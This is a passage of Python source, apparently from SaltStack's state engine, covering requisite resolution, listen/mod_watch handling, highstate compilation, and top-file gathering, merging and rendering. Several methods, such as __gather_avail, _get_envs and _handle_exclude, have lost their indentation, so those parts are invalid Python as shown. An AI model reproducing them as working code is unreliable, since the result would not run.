        status, reqs = self.check_requisite(low, running, chunks)
    if status == 'unmet':
        # Resolve the requisite chunks ourselves; anything that cannot
        # be matched at all is collected in 'lost' and reported
        lost = {}
        reqs = []
        for requisite in requisites:
            lost[requisite] = []
            if requisite not in low:
                continue
            for req in low[requisite]:
                req = trim_req(req)
                found = False
                for chunk in chunks:
                    req_key = next(iter(req))
                    req_val = req[req_key]
                    if req_val is None:
                        continue
                    if req_key == 'sls':
                        # Allow requisite tracking of entire sls files
                        if fnmatch.fnmatch(chunk['__sls__'], req_val):
                            if requisite == 'prereq':
                                chunk['__prereq__'] = True
                            reqs.append(chunk)
                            found = True
                        continue
                    if (fnmatch.fnmatch(chunk['name'], req_val) or
                            fnmatch.fnmatch(chunk['__id__'], req_val)):
                        if chunk['state'] == req_key:
                            if requisite == 'prereq':
                                chunk['__prereq__'] = True
                            elif requisite == 'prerequired':
                                chunk['__prerequired__'] = True
                            reqs.append(chunk)
                            found = True
                if not found:
                    lost[requisite].append(req)
        if lost['require'] or lost['watch'] or lost['prereq'] or lost['onfail'] or lost['onchanges'] or lost.get('prerequired'):
            comment = 'The following requisites were not found:\n'
            for requisite, lreqs in six.iteritems(lost):
                if not lreqs:
                    continue
                comment += \
                    '{0}{1}:\n'.format(' ' * 19, requisite)
                for lreq in lreqs:
                    req_key = next(iter(lreq))
                    req_val = lreq[req_key]
                    comment += \
                        '{0}{1}: {2}\n'.format(' ' * 23, req_key, req_val)
            running[tag] = {'changes': {},
                            'result': False,
                            'comment': comment,
                            '__run_num__': self.__run_num,
                            '__sls__': low['__sls__']}
            self.__run_num += 1
            self.event(running[tag], len(chunks), fire_event=low.get('fire_event'))
            return running
        for chunk in reqs:
            # Check to see if the chunk has been run, only run it if
            # it has not been run already
            ctag = _gen_tag(chunk)
            if ctag not in running:
                if ctag in self.active:
                    if chunk.get('__prerequired__'):
                        # Prereq recusive, run this chunk with prereq on
                        if tag not in self.pre:
                            low['__prereq__'] = True
                            self.pre[ctag] = self.call(low, chunks, running)
                            return running
                        else:
                            return running
                    elif ctag not in running:
                        log.error('Recursive requisite found')
                        running[tag] = {
                            'changes': {},
                            'result': False,
                            'comment': 'Recursive requisite found',
                            '__run_num__': self.__run_num,
                            '__sls__': low['__sls__']}
                    self.__run_num += 1
                    self.event(running[tag], len(chunks), fire_event=low.get('fire_event'))
                    return running
                # Requisite not yet run: recurse into it first
                running = self.call_chunk(chunk, running, chunks)
                if self.check_failhard(chunk, running):
                    running['__FAILHARD__'] = True
                    return running
        if low.get('__prereq__'):
            status, reqs = self.check_requisite(low, running, chunks)
            self.pre[tag] = self.call(low, chunks, running)
            if not self.pre[tag]['changes'] and status == 'change':
                self.pre[tag]['changes'] = {'watch': 'watch'}
                self.pre[tag]['result'] = None
        else:
            # Requisites are now satisfied; re-enter for this chunk
            running = self.call_chunk(low, running, chunks)
        if self.check_failhard(chunk, running):
            running['__FAILHARD__'] = True
            return running
    elif status == 'met':
        if low.get('__prereq__'):
            self.pre[tag] = self.call(low, chunks, running)
        else:
            running[tag] = self.call(low, chunks, running)
    elif status == 'fail':
        # if the requisite that failed was due to a prereq on this low state
        # show the normal error
        if tag in self.pre:
            running[tag] = self.pre[tag]
            running[tag]['__run_num__'] = self.__run_num
            running[tag]['__sls__'] = low['__sls__']
        # otherwise the failure was due to a requisite down the chain
        else:
            # determine what the requisite failures where, and return
            # a nice error message
            failed_requisites = set()
            # look at all requisite types for a failure
            for req_lows in six.itervalues(reqs):
                for req_low in req_lows:
                    req_tag = _gen_tag(req_low)
                    req_ret = self.pre.get(req_tag, running.get(req_tag))
                    # if there is no run output for the requisite it
                    # can't be the failure
                    if req_ret is None:
                        continue
                    # If the result was False (not None) it was a failure
                    if req_ret['result'] is False:
                        # use SLS.ID for the key-- so its easier to find
                        key = '{sls}.{_id}'.format(sls=req_low['__sls__'],
                                                   _id=req_low['__id__'])
                        failed_requisites.add(key)

            _cmt = 'One or more requisite failed: {0}'.format(
                ', '.join(str(i) for i in failed_requisites)
            )
            running[tag] = {
                'changes': {},
                'result': False,
                'comment': _cmt,
                '__run_num__': self.__run_num,
                '__sls__': low['__sls__']
            }
        self.__run_num += 1
    elif status == 'change' and not low.get('__prereq__'):
        # A watched state changed: run the state, then mod_watch if the
        # state itself reported no changes
        ret = self.call(low, chunks, running)
        if not ret['changes'] and not ret.get('skip_watch', False):
            low = low.copy()
            low['sfun'] = low['fun']
            low['fun'] = 'mod_watch'
            low['__reqs__'] = reqs
            ret = self.call(low, chunks, running)
        running[tag] = ret
    elif status == 'pre':
        pre_ret = {'changes': {},
                   'result': True,
                   'comment': 'No changes detected',
                   '__run_num__': self.__run_num,
                   '__sls__': low['__sls__']}
        running[tag] = pre_ret
        self.pre[tag] = pre_ret
        self.__run_num += 1
    elif status == 'onfail':
        running[tag] = {'changes': {},
                        'result': True,
                        'comment': 'State was not run because onfail req did not change',
                        '__run_num__': self.__run_num,
                        '__sls__': low['__sls__']}
        self.__run_num += 1
    elif status == 'onchanges':
        running[tag] = {'changes': {},
                        'result': True,
                        'comment': 'State was not run because none of the onchanges reqs changed',
                        '__run_num__': self.__run_num,
                        '__sls__': low['__sls__']}
        self.__run_num += 1
    else:
        if low.get('__prereq__'):
            self.pre[tag] = self.call(low, chunks, running)
        else:
            running[tag] = self.call(low, chunks, running)
    if tag in running:
        self.event(running[tag], len(chunks), fire_event=low.get('fire_event'))
    return running
def call_listen(self, chunks, running):
    '''
    Find all of the listen routines and call the associated mod_watch runs

    Builds a (state, name/id) -> chunk cross-reference, collects listen
    and listen_in declarations, and for every listened-to state that
    reported changes, queues a mod_watch run of the listener. Unresolvable
    references are recorded as error results. Returns ``running`` updated
    with both the mod_watch results and the errors.
    '''
    listeners = []
    crefs = {}
    for chunk in chunks:
        # Index each chunk by both its name and its ID
        crefs[(chunk['state'], chunk['name'])] = chunk
        crefs[(chunk['state'], chunk['__id__'])] = chunk
        if 'listen' in chunk:
            listeners.append({(chunk['state'], chunk['name']): chunk['listen']})
        if 'listen_in' in chunk:
            # listen_in is inverted into an ordinary listen entry
            for l_in in chunk['listen_in']:
                for key, val in six.iteritems(l_in):
                    listeners.append({(key, val): [{chunk['state']: chunk['name']}]})
    mod_watchers = []
    errors = {}
    for l_dict in listeners:
        for key, val in six.iteritems(l_dict):
            for listen_to in val:
                if not isinstance(listen_to, dict):
                    continue
                for lkey, lval in six.iteritems(listen_to):
                    if (lkey, lval) not in crefs:
                        rerror = {_l_tag(lkey, lval):
                                  {
                                      'comment': 'Referenced state {0}: {1} does not exist'.format(lkey, lval),
                                      'name': 'listen_{0}:{1}'.format(lkey, lval),
                                      'result': False,
                                      'changes': {}
                                  }}
                        errors.update(rerror)
                        continue
                    to_tag = _gen_tag(crefs[(lkey, lval)])
                    if to_tag not in running:
                        continue
                    if running[to_tag]['changes']:
                        if key not in crefs:
                            rerror = {_l_tag(key[0], key[1]):
                                      {'comment': 'Referenced state {0}: {1} does not exist'.format(key[0], key[1]),
                                       'name': 'listen_{0}:{1}'.format(key[0], key[1]),
                                       'result': False,
                                       'changes': {}}}
                            errors.update(rerror)
                            continue
                        # Queue the listener as a mod_watch run, stripped
                        # of its requisites (already satisfied)
                        chunk = crefs[key]
                        low = chunk.copy()
                        low['sfun'] = chunk['fun']
                        low['fun'] = 'mod_watch'
                        low['__id__'] = 'listener_{0}'.format(low['__id__'])
                        for req in STATE_REQUISITE_KEYWORDS:
                            if req in low:
                                low.pop(req)
                        mod_watchers.append(low)
    ret = self.call_chunks(mod_watchers)
    running.update(ret)
    for err in errors:
        errors[err]['__run_num__'] = self.__run_num
        self.__run_num += 1
    running.update(errors)
    return running
def call_high(self, high):
    '''
    Process a high data call and ensure the defined states.

    Reconciles ``extend`` data, verifies structure, resolves
    ``require_in``-style requisites, applies excludes, compiles the
    high data to low chunks, skips any state functions disabled via the
    ``state_runs_disabled`` grain, executes the chunks and finally the
    listen routines. Returns the accumulated run results (or a list of
    errors).
    '''
    errors = []
    # If there is extension data reconcile it
    high, ext_errors = self.reconcile_extend(high)
    errors += ext_errors
    errors += self.verify_high(high)
    if errors:
        return errors
    high, req_in_errors = self.requisite_in(high)
    errors += req_in_errors
    high = self.apply_exclude(high)
    # Verify that the high data is structurally sound
    if errors:
        return errors
    # Compile and verify the raw chunks
    chunks = self.compile_high_data(high)
    # Check for any disabled states
    disabled = {}
    if 'state_runs_disabled' in self.opts['grains']:
        # Iterate a copy because matching chunks are removed from the
        # live list below.
        _chunks = copy.deepcopy(chunks)
        for low in _chunks:
            state_ = '{0}.{1}'.format(low['state'], low['fun'])
            for pat in self.opts['grains']['state_runs_disabled']:
                if fnmatch.fnmatch(state_, pat):
                    comment = (
                        'The state function "{0}" is currently disabled by "{1}", '
                        'to re-enable, run state.enable {1}.'
                    ).format(
                        state_,
                        pat,
                    )
                    _tag = _gen_tag(low)
                    # Record a synthetic "not run" result for the
                    # disabled chunk and drop it from execution.
                    disabled[_tag] = {'changes': {},
                                      'result': False,
                                      'comment': comment,
                                      '__run_num__': self.__run_num,
                                      '__sls__': low['__sls__']}
                    self.__run_num += 1
                    chunks.remove(low)
                    break
    # If there are extensions in the highstate, process them and update
    # the low data chunks
    if errors:
        return errors
    ret = dict(list(disabled.items()) + list(self.call_chunks(chunks).items()))
    ret = self.call_listen(chunks, ret)

    def _cleanup_accumulator_data():
        # Remove this run's accumulator cache file; missing file is fine.
        accum_data_path = os.path.join(
            salt.utils.get_accumulator_dir(self.opts['cachedir']),
            self.instance_id
        )
        try:
            os.remove(accum_data_path)
            log.debug('Deleted accumulator data file {0}'.format(
                accum_data_path)
            )
        except OSError:
            log.debug('File {0} does not exist, no need to cleanup.'.format(
                accum_data_path)
            )
    _cleanup_accumulator_data()
    return ret
def render_template(self, high, template):
    '''
    Normalize the high data rendered from a single, stand-alone template.

    Rejects non-dict renders and the ``include``/``exclude``/``extends``
    declarations (invalid outside a full highstate), pads short state
    declarations, and splits dotted keys like ``file.managed`` into
    ``file: [managed]`` form. Returns ``(high, errors)``.
    '''
    errors = []
    if not high:
        return high, errors
    if not isinstance(high, dict):
        errors.append(
            'Template {0} does not render to a dictionary'.format(template)
        )
        return high, errors
    invalid_items = ('include', 'exclude', 'extends')
    for item in invalid_items:
        if item in high:
            errors.append(
                'The \'{0}\' declaration found on \'{1}\' is invalid when '
                'rendering single templates'.format(item, template)
            )
            return high, errors
    for name in high:
        if not isinstance(high[name], dict):
            if isinstance(high[name], six.string_types):
                # If this is a short state it needs to be padded
                if '.' in high[name]:
                    comps = high[name].split('.')
                    high[name] = {
                        # '__sls__': template,
                        # '__env__': None,
                        comps[0]: [comps[1]]
                    }
                    continue
                errors.append(
                    'ID {0} in template {1} is not a dictionary'.format(
                        name, template
                    )
                )
                continue
        skeys = set()
        for key in sorted(high[name]):
            if key.startswith('_'):
                continue
            if high[name][key] is None:
                errors.append(
                    'ID {0!r} in template {1} contains a short '
                    'declaration ({2}) with a trailing colon. When not '
                    'passing any arguments to a state, the colon must be '
                    'omitted.'.format(name, template, key)
                )
                continue
            if not isinstance(high[name][key], list):
                continue
            if '.' in key:
                comps = key.split('.')
                # Salt doesn't support state files such as:
                #
                # /etc/redis/redis.conf:
                #   file.managed:
                #     - user: redis
                #     - group: redis
                #     - mode: 644
                #   file.comment:
                #     - regex: ^requirepass
                if comps[0] in skeys:
                    errors.append(
                        'ID {0!r} in template {1!r} contains multiple '
                        'state declarations of the same type'
                        .format(name, template)
                    )
                    continue
                # Split 'mod.fun' into mod: [..., fun]
                high[name][comps[0]] = high[name].pop(key)
                high[name][comps[0]].append(comps[1])
                skeys.add(comps[0])
                continue
            skeys.add(key)
    return high, errors
def call_template(self, template):
    '''
    Render the given template file and enforce the states it defines.
    Returns the run results, the rendering errors, or the falsy render
    result when nothing was produced.
    '''
    compiled = compile_template(
        template, self.rend, self.opts['renderer'])
    if not compiled:
        return compiled
    normalized, render_errors = self.render_template(compiled, template)
    if render_errors:
        return render_errors
    return self.call_high(normalized)
def call_template_str(self, template):
    '''
    Render a template passed in as a string and enforce the states it
    defines. Returns run results, rendering errors, or the falsy render
    result when nothing was produced.
    '''
    compiled = compile_template_str(
        template, self.rend, self.opts['renderer'])
    if not compiled:
        return compiled
    normalized, render_errors = self.render_template(compiled, '<template-str>')
    if render_errors:
        return render_errors
    return self.call_high(normalized)
class BaseHighState(object):
'''
The BaseHighState is an abstract base class that is the foundation of
running a highstate, extend it and add a self.state object of type State.
When extending this class, please note that ``self.client`` and
``self.matcher`` should be instantiated and handled.
'''
def __init__(self, opts):
    # NOTE: subclasses must set ``self.client`` before calling this
    # constructor -- __gather_avail() queries it immediately.
    # Merge master/minion options into the working option set.
    self.opts = self.__gen_opts(opts)
    # Monotonic counter used by _handle_iorder to auto-order states.
    self.iorder = 10000
    # saltenv -> list of sls modules known to the fileserver.
    self.avail = self.__gather_avail()
    self.serial = salt.payload.Serial(self.opts)
    # Accumulates rendered highstate data across render_highstate calls.
    self.building_highstate = {}
def __gather_avail(self):
'''
Gather the lists of available sls data from the master
'''
avail = {}
for saltenv in self._get_envs():
avail[saltenv] = self.client.list_states(saltenv)
return avail
def __gen_opts(self, opts):
    '''
    The options used by the High State object are derived from options
    on the minion and the master, or just the minion if the high state
    call is entirely local.
    '''
    # If the state is intended to be applied locally, then the local opts
    # should have all of the needed data, otherwise overwrite the local
    # data items with data from the master
    if 'local_state' in opts:
        if opts['local_state']:
            return opts
    mopts = self.client.master_opts()
    if not isinstance(mopts, dict):
        # An error happened on the master -- fall back to safe defaults.
        opts['renderer'] = 'yaml_jinja'
        opts['failhard'] = False
        opts['state_top'] = salt.utils.url.create('top.sls')
        opts['nodegroups'] = {}
        opts['file_roots'] = {'base': [syspaths.BASE_FILE_ROOTS_DIR]}
    else:
        opts['renderer'] = mopts['renderer']
        opts['failhard'] = mopts.get('failhard', False)
        # Normalize state_top to a salt:// URL regardless of how the
        # master expressed it.
        if mopts['state_top'].startswith('salt://'):
            opts['state_top'] = mopts['state_top']
        elif mopts['state_top'].startswith('/'):
            opts['state_top'] = salt.utils.url.create(mopts['state_top'][1:])
        else:
            opts['state_top'] = salt.utils.url.create(mopts['state_top'])
        opts['nodegroups'] = mopts.get('nodegroups', {})
        # Minion-side state_auto_order wins unless the master sets one.
        opts['state_auto_order'] = mopts.get(
            'state_auto_order',
            opts['state_auto_order'])
        opts['file_roots'] = mopts['file_roots']
        opts['state_events'] = mopts.get('state_events')
        opts['state_aggregate'] = mopts.get('state_aggregate', opts.get('state_aggregate', False))
        opts['jinja_lstrip_blocks'] = mopts.get('jinja_lstrip_blocks', False)
        opts['jinja_trim_blocks'] = mopts.get('jinja_trim_blocks', False)
    return opts
def _get_envs(self):
'''
Pull the file server environments out of the master options
'''
envs = set(['base'])
if 'file_roots' in self.opts:
envs.update(list(self.opts['file_roots']))
return envs.union(set(self.client.envs()))
def get_tops(self):
    '''
    Gather the top files.

    Caches and renders the top file for either the pinned environment
    (``opts['environment']``) or every known environment, then follows
    ``include`` statements inside those tops (breadth-first, each sls
    processed at most once per env). Returns a mapping of
    saltenv -> list of rendered top data.
    '''
    tops = DefaultOrderedDict(list)
    include = DefaultOrderedDict(list)
    done = DefaultOrderedDict(list)
    found = 0  # did we find any contents in the top files?
    # Gather initial top files
    if self.opts['environment']:
        contents = self.client.cache_file(
            self.opts['state_top'],
            self.opts['environment']
        )
        if contents:
            found = 1
            tops[self.opts['environment']] = [
                compile_template(
                    contents,
                    self.state.rend,
                    self.state.opts['renderer'],
                    saltenv=self.opts['environment']
                )
            ]
    else:
        found = 0
        for saltenv in self._get_envs():
            contents = self.client.cache_file(
                self.opts['state_top'],
                saltenv
            )
            if contents:
                found = found + 1
            else:
                log.debug('No contents loaded for env: {0}'.format(saltenv))
            tops[saltenv].append(
                compile_template(
                    contents,
                    self.state.rend,
                    self.state.opts['renderer'],
                    saltenv=saltenv
                )
            )
    if found == 0:
        log.error('No contents found in top file')
    # Search initial top files for includes
    for saltenv, ctops in six.iteritems(tops):
        for ctop in ctops:
            if 'include' not in ctop:
                continue
            for sls in ctop['include']:
                include[saltenv].append(sls)
            ctop.pop('include')
    # Go through the includes and pull out the extra tops and add them
    while include:
        pops = []
        for saltenv, states in six.iteritems(include):
            pops.append(saltenv)
            if not states:
                continue
            for sls_match in states:
                # Includes may be glob patterns over the available sls.
                for sls in fnmatch.filter(self.avail[saltenv], sls_match):
                    if sls in done[saltenv]:
                        continue
                    tops[saltenv].append(
                        compile_template(
                            self.client.get_state(
                                sls,
                                saltenv
                            ).get('dest', False),
                            self.state.rend,
                            self.state.opts['renderer'],
                            saltenv=saltenv
                        )
                    )
                    done[saltenv].append(sls)
        for saltenv in pops:
            if saltenv in include:
                include.pop(saltenv)
    return tops
def merge_tops(self, tops):
    '''
    Cleanly merge the top files.

    First occurrence of a target wins its initial data; later
    occurrences of the same target are reduced to the dict (match
    option) entries followed by the de-duplicated string entries.
    Raises SaltRenderError when a top has no iterable targets.
    '''
    top = DefaultOrderedDict(OrderedDict)
    for ctops in six.itervalues(tops):
        for ctop in ctops:
            for saltenv, targets in six.iteritems(ctop):
                if saltenv == 'include':
                    continue
                try:
                    for tgt in targets:
                        if tgt not in top[saltenv]:
                            top[saltenv][tgt] = ctop[saltenv][tgt]
                            continue
                        # Target already present: keep match-option
                        # dicts, de-duplicate plain sls strings.
                        matches = []
                        states = set()
                        for comp in top[saltenv][tgt]:
                            if isinstance(comp, dict):
                                matches.append(comp)
                            if isinstance(comp, six.string_types):
                                states.add(comp)
                        top[saltenv][tgt] = matches
                        top[saltenv][tgt].extend(list(states))
                except TypeError:
                    raise SaltRenderError('Unable to render top file. No targets found.')
    return top
def verify_tops(self, tops):
    '''
    Verify the contents of the top file data.

    Returns a list of human-readable error strings (empty when the top
    data is structurally sound). Does not raise.
    '''
    errors = []
    if not isinstance(tops, dict):
        errors.append('Top data was not formed as a dict')
        # No further checks will work, bail out
        return errors
    for saltenv, matches in six.iteritems(tops):
        if saltenv == 'include':
            continue
        if not isinstance(saltenv, six.string_types):
            errors.append(
                'Environment {0} in top file is not formed as a '
                'string'.format(saltenv)
            )
        if saltenv == '':
            errors.append('Empty saltenv statement in top file')
        if not isinstance(matches, dict):
            errors.append(
                'The top file matches for saltenv {0} are not '
                'formatted as a dict'.format(saltenv)
            )
        for slsmods in six.itervalues(matches):
            if not isinstance(slsmods, list):
                errors.append('Malformed topfile (state declarations not '
                              'formed as a list)')
                continue
            for slsmod in slsmods:
                if isinstance(slsmod, dict):
                    # This value is a match option
                    for val in six.itervalues(slsmod):
                        if not val:
                            # NOTE(review): the message interpolates
                            # slsmod/val where saltenv was likely
                            # intended -- TODO confirm upstream.
                            errors.append(
                                'Improperly formatted top file matcher '
                                'in saltenv {0}: {1} file'.format(
                                    slsmod,
                                    val
                                )
                            )
                elif isinstance(slsmod, six.string_types):
                    # This is a sls module
                    if not slsmod:
                        errors.append(
                            'Environment {0} contains an empty sls '
                            'index'.format(saltenv)
                        )
    return errors
def get_top(self):
    '''
    Gather every top file and merge them into the final high-level top
    data structure for this minion.
    '''
    return self.merge_tops(self.get_tops())
def top_matches(self, top):
    '''
    Search through the top high data for matches and return the states
    that this minion needs to execute.

    Returns:
        {'saltenv': ['state1', 'state2', ...]}

    Honors a pinned ``opts['environment']``, recurses into
    ``subfilter`` entries, and unions in master-side ext_nodes matches.
    '''
    matches = {}
    # pylint: disable=cell-var-from-loop
    for saltenv, body in six.iteritems(top):
        if self.opts['environment']:
            if saltenv != self.opts['environment']:
                continue
        for match, data in six.iteritems(body):
            def _filter_matches(_match, _data, _opts):
                # Closure over saltenv/matches on purpose (see pylint
                # pragma); recurses for 'subfilter' entries.
                if isinstance(_data, six.string_types):
                    _data = [_data]
                if self.matcher.confirm_top(
                        _match,
                        _data,
                        _opts
                        ):
                    if saltenv not in matches:
                        matches[saltenv] = []
                    for item in _data:
                        if 'subfilter' in item:
                            _tmpdata = item.pop('subfilter')
                            for match, data in six.iteritems(_tmpdata):
                                _filter_matches(match, data, _opts)
                        if isinstance(item, six.string_types):
                            matches[saltenv].append(item)
            _filter_matches(match, data, self.opts['nodegroups'])
    ext_matches = self.client.ext_nodes()
    for saltenv in ext_matches:
        if saltenv in matches:
            # Union, de-duplicated; ordering is not preserved here.
            matches[saltenv] = list(
                set(ext_matches[saltenv]).union(matches[saltenv]))
        else:
            matches[saltenv] = ext_matches[saltenv]
    # pylint: enable=cell-var-from-loop
    return matches
def load_dynamic(self, matches):
    '''
    If autoload_dynamic_modules is True then automatically load the
    dynamic modules.

    Syncs all dynamic modules for the matched environments and, when new
    grains were synced, refreshes grains, pillar and the loaded modules.
    '''
    if not self.opts['autoload_dynamic_modules']:
        return
    # The original code branched on opts['local'] but both branches were
    # byte-identical; a single sync call preserves behavior exactly.
    syncd = self.state.functions['saltutil.sync_all'](list(matches),
                                                      refresh=False)
    if syncd['grains']:
        self.opts['grains'] = salt.loader.grains(self.opts)
        self.state.opts['pillar'] = self.state._gather_pillar()
    self.state.module_refresh()
def render_state(self, sls, saltenv, mods, matches, local=False):
    '''
    Render a state file and retrieve all of the include states.

    sls     -- sls module name (or a local path when ``local`` is True)
    saltenv -- environment to resolve the sls in
    mods    -- set of already-rendered '<env>:<sls>' markers, updated
               in place to prevent re-rendering
    matches -- top-file matches, used to resolve cross-env includes
    local   -- treat ``sls`` as a path on the local filesystem

    Returns ``(state, errors)`` where ``state`` is the merged high data
    for this sls and everything it includes.
    '''
    errors = []
    if not local:
        state_data = self.client.get_state(sls, saltenv)
        fn_ = state_data.get('dest', False)
    else:
        fn_ = sls
        if not os.path.isfile(fn_):
            errors.append(
                'Specified SLS {0} on local filesystem cannot '
                'be found.'.format(sls)
            )
    # In the local branch fn_ is the (truthy) path, so this only fires
    # when the fileserver lookup failed.
    if not fn_:
        errors.append(
            'Specified SLS {0} in saltenv {1} is not '
            'available on the salt master or through a configured '
            'fileserver'.format(sls, saltenv)
        )
    state = None
    try:
        state = compile_template(
            fn_, self.state.rend, self.state.opts['renderer'], saltenv,
            sls, rendered_sls=mods
        )
    except SaltRenderError as exc:
        msg = 'Rendering SLS \'{0}:{1}\' failed: {2}'.format(
            saltenv, sls, exc
        )
        log.critical(msg)
        errors.append(msg)
    except Exception as exc:
        msg = 'Rendering SLS {0} failed, render error: {1}'.format(
            sls, exc
        )
        log.critical(
            msg,
            # Show the traceback if the debug logging level is enabled
            exc_info_on_loglevel=logging.DEBUG
        )
        errors.append('{0}\n{1}'.format(msg, traceback.format_exc()))
    # Mark this sls as rendered; tolerate pydsl renderers that replace
    # mods with something without .add().
    try:
        mods.add('{0}:{1}'.format(saltenv, sls))
    except AttributeError:
        pass
    if state:
        if not isinstance(state, dict):
            errors.append(
                'SLS {0} does not render to a dictionary'.format(sls)
            )
        else:
            include = []
            if 'include' in state:
                if not isinstance(state['include'], list):
                    err = ('Include Declaration in SLS {0} is not formed '
                           'as a list'.format(sls))
                    errors.append(err)
                else:
                    include = state.pop('include')
            self._handle_extend(state, sls, saltenv, errors)
            self._handle_exclude(state, sls, saltenv, errors)
            self._handle_state_decls(state, sls, saltenv, errors)
            for inc_sls in include:
                # inc_sls may take the form of:
                #   'sls.to.include' <- same as {<saltenv>: 'sls.to.include'}
                #   {<env_key>: 'sls.to.include'}
                #   {'_xenv': 'sls.to.resolve'}
                xenv_key = '_xenv'
                if isinstance(inc_sls, dict):
                    env_key, inc_sls = inc_sls.popitem()
                else:
                    env_key = saltenv
                if env_key not in self.avail:
                    msg = ('Nonexistent saltenv {0!r} found in include '
                           'of {1!r} within SLS \'{2}:{3}\''
                           .format(env_key, inc_sls, saltenv, sls))
                    log.error(msg)
                    errors.append(msg)
                    continue
                if inc_sls.startswith('.'):
                    # Relative include: resolve against this sls' dotted
                    # path. NOTE(review): when local=True, state_data is
                    # never assigned and this line would raise NameError
                    # -- TODO confirm upstream.
                    p_comps = sls.split('.')
                    if state_data.get('source', '').endswith('/init.sls'):
                        inc_sls = sls + inc_sls
                    else:
                        inc_sls = '.'.join(p_comps[:-1]) + inc_sls
                if env_key != xenv_key:
                    # Resolve inc_sls in the specified environment
                    if env_key in matches or fnmatch.filter(self.avail[env_key], inc_sls):
                        resolved_envs = [env_key]
                    else:
                        resolved_envs = []
                else:
                    # Resolve inc_sls in the subset of environment matches
                    resolved_envs = [
                        aenv for aenv in matches
                        if fnmatch.filter(self.avail[aenv], inc_sls)
                    ]
                # An include must be resolved to a single environment, or
                # the include must exist in the current environment
                if len(resolved_envs) == 1 or saltenv in resolved_envs:
                    # Match inc_sls against the available states in the
                    # resolved env, matching wildcards in the process. If
                    # there were no matches, then leave inc_sls as the
                    # target so that the next recursion of render_state
                    # will recognize the error.
                    sls_targets = fnmatch.filter(
                        self.avail[saltenv],
                        inc_sls
                    ) or [inc_sls]
                    for sls_target in sls_targets:
                        r_env = resolved_envs[0] if len(resolved_envs) == 1 else saltenv
                        mod_tgt = '{0}:{1}'.format(r_env, sls_target)
                        if mod_tgt not in mods:
                            # Recurse into the included sls and merge its
                            # rendered state into ours.
                            nstate, err = self.render_state(
                                sls_target,
                                r_env,
                                mods,
                                matches
                            )
                            if nstate:
                                self.merge_included_states(state, nstate, errors)
                                state.update(nstate)
                            if err:
                                errors.extend(err)
                else:
                    msg = ''
                    if not resolved_envs:
                        msg = ('Unknown include: Specified SLS {0}: {1} is not available on the salt '
                               'master in saltenv(s): {2} '
                               ).format(env_key,
                                        inc_sls,
                                        ', '.join(matches) if env_key == xenv_key else env_key)
                    elif len(resolved_envs) > 1:
                        msg = ('Ambiguous include: Specified SLS {0}: {1} is available on the salt master '
                               'in multiple available saltenvs: {2}'
                               ).format(env_key,
                                        inc_sls,
                                        ', '.join(resolved_envs))
                    log.critical(msg)
                    errors.append(msg)
            try:
                self._handle_iorder(state)
            except TypeError:
                log.critical('Could not render SLS {0}. Syntax error detected.'.format(sls))
    else:
        state = {}
    return state, errors
def _handle_iorder(self, state):
    '''
    Take a state and apply the iorder system.

    When ``state_auto_order`` is enabled, append an
    ``{'order': <iorder>}`` argument to every state declaration that
    does not already declare one, incrementing ``self.iorder`` so
    declarations run in source order.
    '''
    if self.opts['state_auto_order']:
        for name in state:
            for s_dec in state[name]:
                if not isinstance(s_dec, six.string_types):
                    # PyDSL OrderedDict?
                    continue
                if not isinstance(state[name], dict):
                    # Include's or excludes as lists?
                    continue
                if not isinstance(state[name][s_dec], list):
                    # Bad syntax, let the verify seq pick it up later on
                    continue
                found = False
                if s_dec.startswith('_'):
                    continue
                for arg in state[name][s_dec]:
                    if isinstance(arg, dict):
                        if len(arg) > 0:
                            # Only the first key matters: arg dicts are
                            # single-key name/value pairs.
                            if next(six.iterkeys(arg)) == 'order':
                                found = True
                if not found:
                    if not isinstance(state[name][s_dec], list):
                        # quite certainly a syntax error, managed elsewhere
                        continue
                    state[name][s_dec].append(
                        {'order': self.iorder}
                    )
                    self.iorder += 1
    return state
def _handle_state_decls(self, state, sls, saltenv, errors):
    '''
    Add sls and saltenv components to the state.

    Also pads short string declarations and splits dotted keys
    ('file.managed') into 'file: [..., managed]' form, recording
    malformed declarations in ``errors``.
    '''
    for name in state:
        if not isinstance(state[name], dict):
            # __extend__/__exclude__ are list-valued bookkeeping keys.
            if name == '__extend__':
                continue
            if name == '__exclude__':
                continue
            if isinstance(state[name], six.string_types):
                # If this is a short state it needs to be padded
                if '.' in state[name]:
                    comps = state[name].split('.')
                    state[name] = {'__sls__': sls,
                                   '__env__': saltenv,
                                   comps[0]: [comps[1]]}
                    continue
            errors.append(
                'ID {0} in SLS {1} is not a dictionary'.format(name, sls)
            )
            continue
        skeys = set()
        for key in state[name]:
            if key.startswith('_'):
                continue
            if not isinstance(state[name][key], list):
                continue
            if '.' in key:
                comps = key.split('.')
                # Salt doesn't support state files such as:
                #
                # /etc/redis/redis.conf:
                #   file.managed:
                #     - source: salt://redis/redis.conf
                #     - user: redis
                #     - group: redis
                #     - mode: 644
                #   file.comment:
                #     - regex: ^requirepass
                if comps[0] in skeys:
                    errors.append(
                        'ID {0!r} in SLS {1!r} contains multiple state '
                        'declarations of the same type'.format(name, sls)
                    )
                    continue
                state[name][comps[0]] = state[name].pop(key)
                state[name][comps[0]].append(comps[1])
                skeys.add(comps[0])
                continue
            skeys.add(key)
        if '__sls__' not in state[name]:
            state[name]['__sls__'] = sls
        if '__env__' not in state[name]:
            state[name]['__env__'] = saltenv
def _handle_extend(self, state, sls, saltenv, errors):
    '''
    Take the extend dec out of state and apply to the highstate global
    dec.

    Pops ``extend`` from ``state``, tags each extension with its
    origin sls/env, normalizes dotted keys, and appends the whole dict
    to ``state['__extend__']``. Malformed data is recorded in
    ``errors``.
    '''
    if 'extend' in state:
        ext = state.pop('extend')
        if not isinstance(ext, dict):
            errors.append(('Extension value in SLS {0!r} is not a '
                           'dictionary').format(sls))
            return
        for name in ext:
            if not isinstance(ext[name], dict):
                errors.append(('Extension name {0!r} in SLS {1!r} is '
                               'not a dictionary'
                               .format(name, sls)))
                continue
            if '__sls__' not in ext[name]:
                ext[name]['__sls__'] = sls
            if '__env__' not in ext[name]:
                ext[name]['__env__'] = saltenv
            # NOTE(review): popping keys while iterating ext[name] is a
            # RuntimeError on Python 3 when a dotted key is present --
            # TODO confirm intended Python versions.
            for key in ext[name]:
                if key.startswith('_'):
                    continue
                if not isinstance(ext[name][key], list):
                    continue
                if '.' in key:
                    comps = key.split('.')
                    ext[name][comps[0]] = ext[name].pop(key)
                    ext[name][comps[0]].append(comps[1])
        state.setdefault('__extend__', []).append(ext)
def _handle_exclude(self, state, sls, saltenv, errors):
'''
Take the exclude dec out of the state and apply it to the highstate
global dec
'''
if 'exclude' in state:
exc = state.pop('exclude')
if not isinstance(exc, list):
